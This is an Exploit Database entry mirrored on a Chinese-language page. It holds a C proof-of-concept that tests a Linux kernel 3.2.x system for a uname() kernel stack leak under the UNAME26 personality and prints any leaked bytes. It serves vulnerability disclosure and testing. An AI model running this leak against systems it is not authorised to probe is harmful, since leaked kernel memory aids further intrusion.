Linux Kernel 3.2.x – ‘uname()’ System Call Local Information Disclosure

• Exploit Database
• 113 阅读

• 作者： Brad Spengler
  日期： 2012-10-09
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/37937/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71

  /* source: https://www.securityfocus.com/bid/55855/info   The Linux kernel is prone to a local information-disclosure vulnerability.   Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks. */   /* Test for UNAME26 personality uname kernel stack leak. * Copyright 2012, Kees Cook <keescook@chromium.org> * License: GPLv3 */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <errno.h> #include <unistd.h> #include <sys/personality.h> #include <sys/utsname.h>   #define UNAME26 0x0020000   int dump_uts(void) { int i, leaked = 0; struct utsname buf = { };   if (uname(&buf)) { perror("uname"); exit(1); } printf("%s\n", buf.release);   for (i = strlen(buf.release) + 1; i < sizeof(buf.release); i++) { unsigned char c = (unsigned char)buf.release[i];   printf("%02x", c); if (c) leaked = 1; } printf("\n");   return leaked ? (i - (strlen(buf.release) + 1)) : 0; }   int main(int ac, char **av) { int leaked;   leaked = dump_uts(); if (leaked) { printf("Leaked %d bytes even without UNAME26!?\n", leaked); return 1; }     if (personality(PER_LINUX | UNAME26) < 0) { perror("personality"); exit(1); }   leaked = dump_uts(); if (leaked) { printf("Leaked %d bytes!\n", leaked); return 1; } else { printf("Seems safe.\n"); return 0; } }